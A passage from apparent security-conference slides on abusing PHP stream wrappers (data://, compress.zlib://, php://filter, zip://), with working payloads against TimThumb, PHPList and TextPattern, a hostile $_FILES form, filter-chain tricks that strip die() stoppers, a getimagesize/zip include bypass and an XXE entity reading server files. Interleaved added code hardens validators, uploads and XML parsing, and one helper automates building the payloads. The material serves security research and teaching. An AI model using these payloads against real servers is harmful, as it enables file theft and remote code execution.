POST DATA: src=data://img.youtube.com/aaamy.php?;base64,SSBsb3ZlIFBIUAo

Local file manipulation:
POST DATA: src=compress.zlib://img.youtube.com/../path/to/local/file;
11. Bypass preg_match validation

The filter below is bypassed because its pattern is not anchored: any string that contains http://w somewhere satisfies it.

POST DATA: src=data://text/plain;charset=http://w?param=anyval;base64,SSBsb3ZlIFBIUAo
POST DATA: src=compress.zlib://youtube.com/../http://?/../../path/to/local/file

function validate_url($url) {
    $pattern = "/\b(?:(?:https?):\/\/|www\.)[-a-z0-9+&@#\/%?=~_|!:,.;]*[-a-z0-9+&@#\/%=~_|]/i";
    return preg_match($pattern, $url);
}
$src = $_POST['src'];
if (!validate_url($src)) display_error('invalid url');
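An added example (not the slides' or TimThumb's code) covering slides 8, 10 and 11 together: a thumbnail fetcher that anchors its pattern, checks the scheme as well as the host returned by parse_url(), chooses the local file name itself, and reads the stream metadata without extract(). The allowed hosts, the destination directory and the $_POST field are assumptions.

```php
<?php
// Added example, not code from the slides. Assumptions: thumbnails are only
// fetched from the hosts in ALLOWED_HOSTS and stored under a fixed directory
// with a name the server chooses itself.

const ALLOWED_HOSTS = ['img.youtube.com', 'i.ytimg.com'];
const ALLOWED_EXT   = ['jpg', 'jpeg', 'png', 'gif'];

// Returns the safe local file name for $src, or null if $src is not an
// http(s) URL on an allowed host.
function validate_image_url(string $src): ?string
{
    // Anchored, unlike the TimThumb pattern on the slide, which matched
    // "http://w" anywhere and so accepted data://...;charset=http://w?...
    if (!preg_match('~\Ahttps?://[^/?#\s]+/[^\s]*\z~i', $src)) {
        return null;
    }
    $u = parse_url($src);
    if ($u === false || !isset($u['scheme'], $u['host'], $u['path'])) {
        return null;
    }
    // parse_url() reports img.youtube.com as the "host" of
    // data://img.youtube.com/... and compress.zlib://img.youtube.com/... too,
    // so the scheme has to be checked together with the host.
    if (!in_array(strtolower($u['scheme']), ['http', 'https'], true)
        || !in_array(strtolower($u['host']), ALLOWED_HOSTS, true)) {
        return null;
    }
    $ext = strtolower(pathinfo($u['path'], PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    // The caller never influences the local name: no "aaamy.php" via substr().
    return sha1($src) . '.' . $ext;
}

function fetch_image(string $src, string $destDir): ?string
{
    $name = validate_image_url($src);
    if ($name === null) {
        return null;
    }
    $fp = @fopen($src, 'rb');
    if ($fp === false) {
        return null;
    }
    // Read the metadata keys you need; never extract() this array into
    // local variables (slide 8 shows data: parameters landing in $password).
    $meta = stream_get_meta_data($fp);
    // PHP registers https:// with the http wrapper, so both report "http".
    if ($meta['wrapper_type'] !== 'http') {
        fclose($fp);
        return null;
    }
    $dest = rtrim($destDir, '/') . '/' . $name;
    $written = file_put_contents($dest, $fp);   // accepts the stream directly
    fclose($fp);
    return $written === false ? null : $dest;
}

// Constructed inputs: the legitimate URL and the bypasses from slides 10 and 11.
$inputs = [
    'http://img.youtube.com/vi/Uvwfxki7ex4/0.jpg',
    'data://img.youtube.com/aaamy.php?;base64,SSBsb3ZlIFBIUAo',
    'compress.zlib://img.youtube.com/../path/to/local/file;',
    'data://text/plain;charset=http://w?param=anyval;base64,SSBsb3ZlIFBIUAo',
    'compress.zlib://youtube.com/../http://?/../../path/to/local/file',
];
foreach ($inputs as $in) {
    printf("%-75s => %s\n", $in, validate_image_url($in) ?? 'rejected');
}
```

Only the first input yields a file name; the four wrapper-based inputs fail the anchored pattern before parse_url() is consulted, and the scheme check catches anything that gets past a looser pattern. fetch_image() needs allow_url_fopen=On and a writable $destDir.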
12. Arbitrary File Loading in TimThumb

TimThumb is a popular script used for image resizing.
Public exploit for v1.32 (08/2011): http://www.exploit-db.com/exploits/17602
New wrappers exploit for v1.34 (revision 145):

function check_external($src) {
    ...
    if (!validate_url($src)) display_error('invalid url');
    $url_info = parse_url($src);
    ...
    if ($url_info['host'] == 'www.youtube.com' || ...)
        parse_str($url_info['query']);
    ...
    $fh = fopen($local_filepath, 'w');
    $ch = curl_init($src);
    ...
    $files_infos = getimagesize($local_filepath);
    if (empty($file_infos['mime']) || ...)
        unlink($local_filepath);
    ...

parse_str() registers the query parameters as variables, so the query string overwrites $local_filepath and $url_info['host']:

http://www.youtube.com/?local_filepath=php://filter/resource%3D./path/to/.php&url_info[host]=img.youtube.com&src=http://mysite.com/thumb.txt
13. File Manipulation in TimThumb v1.35

Requirement: the curl_init function is disabled on the target server, so the file_get_contents() path is taken:

...
if (!$img = file_get_contents($src)) {
    display_error('error....');
}
if (file_put_contents($local_filepath, $img) == FALSE) {
    display_error('error.....');
}
...

Create a file with arbitrary content:
data://img.youtube.com/e;charset=http://w?&var=;base64,SSBsb3ZIIFBIUAo

"Read" a local file:
compress.zlib://youtube.com/../http://?/../../path/to/local/file
14. Secret features of the php://filter wrapper

php://filter allows you to filter a stream while opening it. Filter the file content:

readfile('php://filter/read=string.toupper|anyfilter|string.rot13/resource=./file.php');

An unknown filter does not influence the results of the other filters (PHP warns that it cannot create the filter and applies the rest).
The convert.base64-decode and string.strip_tags filters can delete data from the stream.
Stefan Esser used the convert.base64-decode filter in an exploit for Piwik in 2009:
http://sektioneins.de/en/advisories/advisory-032009-piwik-cookie-unserialize-vulnerability

Since 2009, two important questions have remained open: how to delete "unused" data, and what are the advantages of filters?
15. Base64 algorithm: encoding

RFC 2045, section 6.8 describes the Base64 algorithm.
Base64 alphabet: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
16. Base64 algorithm: decoding

While decoding, only characters of the Base64 alphabet are handled; every other byte is skipped.
The input string is divided into groups of 4 characters, and every group is handled separately.
17. Example: "extrusion" of a stopper

You can delete some data by applying base64_decode several times.

$content = "; <? die; ?>\n";
$content .= "[/Ly8vVTFOQ1RXSXpXbXhKUmtKSlZVRTlQUT09]\n";
$file = 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=./PoC';
file_put_contents($file, $content);

"Stub": /Ly8v (base64_decode('Ly8v') == '///'). The stopper leaves the alphabet characters "die" behind; the stub pads them to a full group and absorbs what that group decodes to, so that after three rounds only the payload remains and ./PoC contains "I love PHP".

The convert.base64-decode filter does not handle strings with an equal sign in the middle:

$s = 'php://filter/read=convert.base64-decode/resource=data:,dGVzdA==CRAP';
var_dump(file_get_contents($s)); // prints: string(0) ""
18. Filter string.strip_tags

The string.strip_tags filter speeds up the "extrusion" process:

$content = "; <? die; ?>\n";
$content .= "=3C=3Fprint('PHP');\n";
$file = 'php://filter/write=string.strip_tags|convert.quoted-printable-decode/resource=./PoC';
file_put_contents($file, $content);

The convert.quoted-printable-decode filter handles the string symbol by symbol: characters in Quoted-Printable format (RFC 2045, section 6.7) are converted into characters of an 8-bit code page. Conversion into Quoted-Printable format:

$quoted_printable_lt = '='.strtoupper(dechex(ord('<'))); // =3C

The convert.quoted-printable-decode filter fails when an equal sign is not followed by a hexadecimal character code:

$s = 'php://filter/read=convert.quoted-printable-decode/resource=data:,dGVz=CRAP';
var_dump(file_get_contents($s)); // prints: string(0) ""
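An added example (not the slides' own code) for the "extrusion" of slides 17 and 18: instead of choosing the stub /Ly8v by hand, a small search computes one absorber per decode round for a given stopper, builds the nested encoding, and pushes the result through PHP's real convert.base64-decode chain to confirm that only the payload lands on disk. The stopper, the payload and the number of rounds are assumptions; the model of the filter (alphabet characters consumed, every other byte skipped) is the behaviour the slides describe.

```php
<?php
// Added example, not code from the slides: automates the stub the slide
// picks by hand (/Ly8v) and checks the result through PHP's own filter.
// The stopper, the payload and the number of decode rounds are assumptions.

const B64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';

// What convert.base64-decode actually consumes: every other byte is skipped.
function b64_chars(string $s): string
{
    return preg_replace('~[^A-Za-z0-9+/]~', '', $s);
}

// All alphabet strings of a given length, for the small brute force below.
function alphabet_strings(int $len): Generator
{
    if ($len === 0) {
        yield '';
        return;
    }
    foreach (alphabet_strings($len - 1) as $head) {
        for ($i = 0; $i < 64; $i++) {
            yield $head . B64[$i];
        }
    }
}

// One absorber per decode round. Round n sees the alphabet characters the
// stopper leaves behind ("die" for "; <? die; ?>"); the absorber pads them to a
// multiple of 4 so that they decode to bytes with as few alphabet characters
// as possible, which is all the next round will see of them. The last round
// must see none at all, because its output is the file content.
function find_absorbers(string $stopper, int $rounds): ?array
{
    $absorbers = [];
    $prefix = $stopper;
    for ($round = 1; $round <= $rounds; $round++) {
        $stray = b64_chars($prefix);
        if ($round === $rounds) {
            if ($stray !== '') {
                return null;             // the stopper needs more rounds to vanish
            }
            $absorbers[] = '';
            break;
        }
        $need = (4 - strlen($stray) % 4) % 4;
        $best = '';
        $bestDecoded = '';
        $bestLeft = PHP_INT_MAX;
        foreach (alphabet_strings($need) as $cand) {
            $decoded = base64_decode($stray . $cand, true);
            $left = strlen(b64_chars($decoded));
            if ($left < $bestLeft) {
                [$best, $bestDecoded, $bestLeft] = [$cand, $decoded, $left];
            }
            if ($left === 0) {
                break;
            }
        }
        $absorbers[] = $best;
        $prefix = $bestDecoded;
    }
    return $absorbers;
}

// Nest the encodings so that round n+1 finds absorber n+1 in front of the payload.
function build_content(string $stopper, string $payload, array $absorbers): string
{
    $inner = base64_encode($payload);
    for ($i = count($absorbers) - 1; $i >= 1; $i--) {
        $inner = base64_encode($absorbers[$i] . $inner);
    }
    return $stopper . $absorbers[0] . $inner;
}

// Push the content through the real filter chain and return what lands on disk.
function write_through_decoders(string $content, int $rounds): string
{
    $tmp = tempnam(sys_get_temp_dir(), 'poc');
    $chain = implode('|', array_fill(0, $rounds, 'convert.base64-decode'));
    file_put_contents('php://filter/write=' . $chain . '/resource=' . $tmp, $content);
    $out = (string) file_get_contents($tmp);
    unlink($tmp);
    return $out;
}

$stopper = "; <? die; ?>\n";           // the stopper from the slide
$payload = "I love PHP\n";              // what the file should end up holding
$rounds  = 3;

$absorbers = find_absorbers($stopper, $rounds);
if ($absorbers === null) {
    exit("no stub found with $rounds rounds\n");
}
$content = build_content($stopper, $payload, $absorbers);
$onDisk  = write_through_decoders($content, $rounds);
printf("absorbers: %s\ncontent:   %s\nresult:    %s\n",
    json_encode($absorbers, JSON_UNESCAPED_SLASHES), json_encode($content, JSON_UNESCAPED_SLASHES),
    $onDisk === $payload ? 'stopper gone, payload intact' : 'mismatch: ' . bin2hex($onDisk));
```

For the slide's stopper the search returns the absorbers "A", "AAA" and "", an equivalent of the hand-made "/" plus "Ly8v" (which decodes to "///"): the stray "die" plus one character always decodes to the alphabet byte "v" followed by two bytes outside the alphabet, so the second round needs exactly three more characters. A stopper that leaves more alphabet characters behind may need more than three rounds, in which case find_absorbers() returns null rather than producing garbage in front of the payload.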
19. TextPattern: Upload Arbitrary Files (I)

A file with the .php extension stores information about comment authors:

$file = $prefs['tempdir'].DS.'evaluator_trace.php';
if (!file_exists($file)) {
    $fp = fopen($file, 'wb');
    if ($fp)
        fwrite($fp, "<?php return; ?>\n".
            "This trace-file tracks saved comments. (created ".
            safe_strftime($prefs['archive_dateformat'],time()).")\n".
            "Format is: Type; Probability; Message ".
            "(Type can be -1 => spam, 0 => moderate, 1 => visible)\n\n");
21. Partial File Reading in PHPList <= 2.10.13 (I)

The cause is the possibility of modifying the structure of the $_FILES array:
http://isisblogs.poly.edu/2011/08/11/php-not-properly-checking-params/

if (is_array($_FILES)) { ## only avatars are files
    foreach ($_FILES['attribute']['name'] as $key => $val) {
        if (!empty($_FILES['attribute']['name'][$key])) {
            $tmpnam = $_FILES['attribute']['tmp_name'][$key];
            $size = $_FILES['attribute']['size'][$key];
            if ($size < MAX_AVATAR_SIZE) {
                $avatar = file_get_contents($tmpnam);
                Sql_Query(sprintf('replace into %s (userid,attributeid,value) values(%d,%d,"%s")',
                    $tables["user_attribute"], $id, $key, base64_encode($avatar)));

The following HTML form allows an attacker to read server files into the database: the malformed field names make $_FILES['attribute']['tmp_name'][$key] an attacker-supplied string instead of a temporary upload path.

<form action="http://localhost/lists/admin/?page=user&id=1" method="POST" enctype="multipart/form-data">
<input type="file" name="attribute[tmp_name][">
<input type="file" name="attribute[size][">
<input type="file" name="attribute[[tmp_name]">
<input type="file" name="attribute[name][">
<input name="change" value="Save Changes" type="submit">
</form>
22. Partial File Reading in PHPList <= 2.10.13 (II)
23. getimagesize check bypass (I)

With filters, you manage not only to delete stoppers but also to modify images that are checked with the getimagesize function. If you manage to inject data into the EXIF segment of the image
24. getimagesize check bypass (II)

extract($_REQUEST);
...
include $templatedir.'/header.html';
...
if (!empty($_FILES)) {
    $file_info = getimagesize($_FILES['image']['tmp_name']);
    if ($file_info['mime'] == 'image/jpeg') {
        if (move_uploaded_file($_FILES['image']['tmp_name'], $folder.'/avatar.jpg'))
            ...

Upload a valid JPEG, but store a zip archive containing /my/header.html on the server: getimagesize() checks the upload, while the filters in $folder strip the image down to the base64-encoded archive carried in its EXIF data, so /tmp/avatar.jpg ends up being the archive.

folder=php://filter/write=string.strip_tags|convert.base64-decode/resource=/tmp/

Include the file from the zip archive:

templatedir=zip:///tmp/avatar.jpg#/my
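An added example (not the slides' own code) of the upload handler hardened against this bypass: the destination directory and file name come from the server, not from extract($_REQUEST), and the image is re-encoded through GD so that nothing hidden in EXIF segments or appended after the image survives. It assumes the GD extension is loaded and that the avatar directory is served as static files; the directory, size limit and the CLI self-check input are constructed for the example.

```php
<?php
// Added example, not code from the slides. Assumptions: the GD extension is
// loaded, avatars live under a fixed directory that the request cannot
// choose, and that directory is served as static files, never executed.

const AVATAR_DIR = __DIR__ . '/uploads/avatars';
const MAX_AVATAR_BYTES = 512 * 1024;

// Re-encode a JPEG through GD. getimagesize() only inspects the header, so it
// also accepts a JPEG that carries a zip archive or PHP code in an EXIF or
// comment segment, or appended after the EOI marker; decoding and re-encoding
// writes every byte anew and none of that survives.
function sanitize_jpeg(string $src, string $dest): bool
{
    $info = @getimagesize($src);
    if ($info === false || $info[2] !== IMAGETYPE_JPEG) {
        return false;
    }
    $img = @imagecreatefromjpeg($src);      // needs decodable JPEG data, not just a header
    if ($img === false) {
        return false;
    }
    $ok = imagejpeg($img, $dest, 85);
    imagedestroy($img);
    return $ok;
}

// Store an uploaded avatar for $userId; the server picks the name and the
// directory, so neither $folder nor any other request variable is consulted.
function store_avatar(array $file, int $userId): ?string
{
    if (!isset($file['tmp_name'], $file['size']) || !is_uploaded_file($file['tmp_name'])
        || $file['size'] > MAX_AVATAR_BYTES) {
        return null;
    }
    $dir = realpath(AVATAR_DIR);            // false for a wrapper or a missing directory
    if ($dir === false) {
        return null;
    }
    $dest = $dir . DIRECTORY_SEPARATOR . $userId . '.jpg';
    return sanitize_jpeg($file['tmp_name'], $dest) ? $dest : null;
}

// Self-check from the command line with a constructed file: a GD-made JPEG
// plus an appended "archive" still passes getimagesize(), but the
// re-encoded copy no longer contains the trailer.
if (PHP_SAPI === 'cli') {
    $src = tempnam(sys_get_temp_dir(), 'in');
    $dst = tempnam(sys_get_temp_dir(), 'out');
    $im = imagecreatetruecolor(8, 8);
    imagejpeg($im, $src);
    imagedestroy($im);
    file_put_contents($src, "PK\x03\x04<?php print_r(ini_get_all()); ?>", FILE_APPEND);
    printf("getimagesize() on the tampered upload: %s\n", getimagesize($src)['mime']);
    printf("sanitize_jpeg(): %s; trailer still present: %s\n",
        sanitize_jpeg($src, $dst) ? 'ok' : 'failed',
        strpos((string) file_get_contents($dst), '<?php') === false ? 'no' : 'yes');
    unlink($src);
    unlink($dst);
}
```

In the web handler the call is store_avatar($_FILES['image'], $uid) with $uid taken from the session; a php://filter/write=... destination can no longer be injected because the path is built from a constant and realpath() rejects anything that is not a real local directory.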
25. Files with arbitrary content

If you manage to create a file with arbitrary content, you can:
- create a session file and exploit an unserialize bug via session_start();
- create a zip archive and exploit RFI;
- create or rewrite .htaccess/.htpasswd files;
- create or rewrite templates.
26. parse_ini_file attack

The parse_ini_file function handles local files only, but local wrappers such as php://filter are still accepted:

session_start();
$_SESSION['admin'] = $_POST['name'];
...
$var = parse_ini_file($inifile);
require $var['require'];

Create the session file /tmp/sess_dffdsdf24gssdgsd90 by submitting the base64 payload as the name:

admin|s:68:"Ly8vVnpOYWFHTnNNRXRqYlZaNFpGZHNlVnBVTUdsTU1sWXdXWGs1YjJJelRqQmplVWs5";

With filters, transform the session file into a format suitable for the parse_ini_file function (the serialization prefix is the stopper, and /Ly8v is again the stub):

php://filter/read=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=/tmp/sess_dffdsdf24gssdgsd90
27. XXE Attack

Read files via XML injection:

<?xml version='1.0'?>
<!DOCTYPE scan [
  <!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=http://127.0.0.1/server-status">
]>
<scan>&test;</scan>

The simplexml_load_file function and the DOMDocument::load method support wrappers, both for the document path and for external entities.
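An added example (not the slides' own code) of parsing untrusted XML so that the entity above is never resolved: the document arrives as a string (so no wrapper can be passed as the file path), any DOCTYPE is rejected before libxml sees it, network access is disabled, and entity substitution is not requested. The sample documents are constructed for the example.

```php
<?php
// Added example, not code from the slides. Assumption: the application only
// needs plain element and attribute data from the XML it receives, never a DTD.

// Parses untrusted XML without letting it declare entities. Returns null on
// any DTD or parse error.
function parse_untrusted_xml(string $xml): ?SimpleXMLElement
{
    // A DOCTYPE is the only way to declare an entity, so rejecting it up front
    // removes the file-reading SYSTEM entity from the slide regardless of
    // libxml's version or settings.
    if (preg_match('/<!DOCTYPE/i', $xml)) {
        return null;
    }
    if (PHP_VERSION_ID < 80000) {
        // On older PHP/libxml combinations external entity loading is on by default.
        libxml_disable_entity_loader(true);
    }
    $prev = libxml_use_internal_errors(true);
    // LIBXML_NONET: no network fetches; and deliberately no LIBXML_NOENT,
    // which would ask libxml to substitute entities.
    $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NONET);
    $errors = libxml_get_errors();
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    return ($doc === false || $errors) ? null : $doc;
}

// Constructed inputs: the XXE document from the slide and a harmless one.
$xxe = <<<'XML'
<?xml version='1.0'?>
<!DOCTYPE scan [
  <!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=http://127.0.0.1/server-status">
]>
<scan>&test;</scan>
XML;
$plain = "<?xml version='1.0'?><scan><host>10.0.0.1</host></scan>";

foreach (['xxe' => $xxe, 'plain' => $plain] as $label => $input) {
    $doc = parse_untrusted_xml($input);
    printf("%-5s => %s\n", $label,
        $doc === null ? 'rejected' : 'parsed, root <' . $doc->getName() . '>');
}
```

The same flags apply to DOMDocument::loadXML(); the point is that the parser is handed a string obtained by the application, never a user-controlled path, and that the document cannot bring its own DTD.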
28. Limitations for the usage of wrappers

By default, wrappers cannot be used in includes when Suhosin is installed (even if allow_url_include = On). A wrapper becomes available once the whitelist includes it, for example zip://:

suhosin.executor.include.whitelist = "zip"

The file_exists, is_file and filesize functions return FALSE when the php://filter, zip:// or data:// wrappers are used as file names.
29. Thank you for your attention! Questions?